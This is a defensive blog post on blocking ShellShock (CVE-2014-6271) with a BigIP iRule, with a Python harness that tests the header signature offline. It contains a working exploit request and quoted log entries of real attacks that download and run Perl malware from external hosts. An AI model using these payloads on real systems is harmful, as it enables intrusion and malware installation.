Use a BigIP iRule to further defend against ShellShock

By now you've no doubt heard about ShellShock and have quickly patched all your systems against this pervasive vulnerability. You may also be aware that the first patch did not fully close the hole: it stops the original arbitrary command execution, but the bash parser could still be tricked into misbehaving on crafted input (tracked separately as CVE-2014-7169), so a second round of patches was required.

The exploit is pretty simple to execute. The web server hands request headers to CGI scripts as environment variables (the User-Agent becomes HTTP_USER_AGENT), and an unpatched bash treats any variable whose value begins with "() {" as a function definition, executing whatever follows the closing brace when it starts up. So, against a server whose CGI script is itself a bash script or invokes one, the User-Agent header in this request will write the text "HACKED" to a file named hack.txt in the /tmp directory:

GET /cgi-bin/anypage.html HTTP/1.1
Host: yourhost
User-Agent: () { :;}; echo HACKED >>/tmp/hack.txt
Accept: text/xml,application/xml
Accept-Language: en-us

So, in addition to patching your servers, if you've got a BigIP in front of your systems, you can also set up an iRule to stop this traffic before it ever reaches your servers, by looking for the function-definition signature "() {" (with the space; that is the exact prefix bash checks for) in the value of any request header:
[Screenshot: big-ip-irule-shellshock]

The iRule itself is posted on F5's DevCentral forum, and F5 maintains a dedicated, regularly updated ShellShock information page. There are two versions of the iRule: one that trades a little performance to log each attack attempt, and a leaner one that blocks the request but does not log it.
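To check that a signature like this actually catches the traffic you expect before putting it in front of production, it helps to run the same logic over captured requests offline. The Python below is an added example, not the F5 iRule from the forum: it mirrors what such an iRule does (scan every header value of a request for the bash function-import prefix "() {", then emit a log line in the same shape as the BIG-IP log entries quoted further down). The function names, the sample requests (the first is the probe request shown above, the others are constructed) and the client IP are all assumptions made for the example.

```python
"""Offline test of a ShellShock (CVE-2014-6271) header signature.

Added example; it reproduces the header-scanning logic of a blocking iRule in
plain Python so the signature can be exercised against captured requests.
"""

# The vulnerable bash imported a function from any environment variable whose
# value began with exactly these four bytes: "() {" (note the space). Matching
# "(){" without the space would miss the real attack string.
SHELLSHOCK_PREFIX = "() {"


def parse_request(raw):
    """Parse a raw HTTP/1.x request head into (method, uri, [(name, value), ...]).

    Duplicate headers are kept as separate tuples: the payload can arrive in
    any header, including a repeated one, and every value must be inspected.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.splitlines()
    method, uri, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")  # only the first colon separates name from value
        headers.append((name.strip(), value.strip()))
    return method, uri, headers


def find_shellshock(headers, prefix=SHELLSHOCK_PREFIX):
    """Return (header_name, value) for the first header carrying the signature, else None.

    `prefix in value` is deliberately wider than bash's own start-of-value test;
    no legitimate header value contains "() {", so the only cost is a false
    positive, while the benefit is catching values the server may have prefixed.
    """
    for name, value in headers:
        if prefix in value:
            return name, value
    return None


def log_line(client_ip, header_name, value, uri, rule="block_shellshock"):
    """Format a hit in the shape of the BIG-IP log entries quoted in the post
    (the BIG-IP syslog prefix, e.g. 'Sep xx tmm tmm[1665]:', is not reproduced)."""
    return (f"Rule {rule} : Detected CVE-2014-6271 attack from '{client_ip}' "
            f"in HTTP Header {header_name} = '{value}'; URI = '{uri}'")


def inspect(raw_request, client_ip):
    """Return a log line if the request carries the signature, else None."""
    _method, uri, headers = parse_request(raw_request)
    hit = find_shellshock(headers)
    if hit is None:
        return None
    name, value = hit
    return log_line(client_ip, name, value, uri)


# Constructed sample traffic. PROBE is the request from the post; the client IP
# used below (192.0.2.10) is a documentation address, not a real attacker.
PROBE = ("GET /cgi-bin/anypage.html HTTP/1.1\r\n"
         "Host: yourhost\r\n"
         "User-Agent: () { :;}; echo HACKED >>/tmp/hack.txt\r\n"
         "Accept: text/xml,application/xml\r\n"
         "Accept-Language: en-us\r\n\r\n")

# Same payload hidden in the Cookie header, with an innocent-looking User-Agent.
COOKIE_PROBE = ("GET /cgi-bin/status.cgi HTTP/1.1\r\n"
                "Host: yourhost\r\n"
                "User-Agent: Mozilla/5.0\r\n"
                "Cookie: () { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a\r\n\r\n")

BENIGN = ("GET /index.html HTTP/1.1\r\n"
          "Host: yourhost\r\n"
          "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n")

if __name__ == "__main__":
    for req in (PROBE, COOKIE_PROBE, BENIGN):
        print(inspect(req, "192.0.2.10"))
```

Running it prints a log line for the two probes and None for the benign request. The last thing worth trying with this harness is the signature as it is sometimes written, "(){" without the space: against the probe above it matches nothing, which is exactly the kind of gap you want to find offline rather than in the BIG-IP logs.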

Sure enough, within minutes of applying this iRule to our front-end servers at a client site, we started seeing attack attempts in the BigIP logs. So be warned: the bad guys are out there and actively exploiting this bug, so do everything you can to secure your systems.

Here are some example attacks from those logs, doing everything from probing whether a server is vulnerable to downloading and executing Perl malware (and deleting the downloaded file afterwards to cover its tracks):

Sep xx tmm tmm[1665]: Rule block_shellshock : Detected CVE-2014-6271 attack from '54.251.83.67' in HTTP Header User-Agent = '() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a'; URI = '/'

Sep xx tmm tmm[1665]: Rule block_shellshock : Detected CVE-2014-6271 attack from '173.45.100.18' in HTTP Header User-Agent = '() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*"'; URI = '/cgi-bin/hi'

Sep xx tmm tmm[1665]: Rule block_shellshock : Detected CVE-2014-6271 attack from '128.199.207.34' in HTTP Header User-Agent = '() { :;}; /bin/bash -c 'cd /tmp; wget http://dl.directxex.net/download/nice.png; perl nice.png; rm -rf nice.png"; URI = '/cgi-sys/defaultwebpage.cgi'

It's funny how cleanly commented and versioned this malware is. If there's any doubt about what these bad guys are trying to download, here's some of the source code:
[Screenshot: shellshock-malware]
[Screenshot: shellshock-attack-script]
